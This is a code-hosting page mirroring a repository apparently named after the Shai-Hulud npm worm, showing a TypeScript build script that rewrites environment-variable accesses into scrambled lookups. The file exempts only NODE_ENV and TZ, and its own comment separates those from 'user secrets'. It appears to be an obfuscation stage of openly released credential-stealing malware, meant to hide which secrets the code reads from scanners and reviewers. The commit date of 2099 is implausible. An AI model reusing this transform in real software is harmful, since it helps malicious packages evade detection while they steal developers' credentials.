Mirrors/g00dfe11ow-shai-hulud-open-source
1
0
Fork 0
mirror of https://github.com/g00dfe11ow/Shai-Hulud-Open-Source.git synced 2026-06-08 23:07:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
39210a6efdf4145d93f0af1913bed1a2d73de856
g00dfe11ow-shai-hulud-open-…/scripts/env-scramble.ts
T
TeamPCP_OSS a656ef1a7c Shai-Hulud: A Gift From TeamPCP
2099-01-01 01:01:01 +00:00

44 lines
1.3 KiB
TypeScript
Raw Blame History

/**
* Build-time transform that rewrites all `process.env.SOME_KEY` member
* expressions into `process.env[scramble("SOME_KEY")]` so that the
* subsequent scramble transform can encode the environment variable
* names.
*
* Must run BEFORE the scramble transform in the pipeline.
*
* Matches dot-access syntax only (`process.env.FOO`). Bracket-access
* like `process.env["FOO"]` is left alone — the scramble transform
* will already pick those up if they use `scramble(...)`.
*/
const PROCESS_ENV_DOT = /process\.env\.([A-Za-z_$][A-Za-z0-9_$]*)/g;
/**
* Keys that should never be rewritten — they are resolved by the
* runtime or Node/Bun internals and don't represent user secrets.
*/
const IGNORED_KEYS = new Set(["NODE_ENV", "TZ"]);
export function transformEnvAccess(
code: string,
logPrefix = "[ENV-SCRAMBLE]",
sourceLabel?: string,
): { code: string; replacements: number } {
let replacements = 0;
const transformed = code.replace(PROCESS_ENV_DOT, (_match, key: string) => {
if (IGNORED_KEYS.has(key)) return _match;
replacements++;
return `process.env[scramble("${key}")]`;
});
if (replacements > 0) {
const where = sourceLabel ? ` in ${sourceLabel}` : "";
console.log(
`${logPrefix} Rewrote ${replacements} process.env access(es)${where}`,
);
}
return { code: transformed, replacements };
}
Reference in New Issue View Git Blame Copy Permalink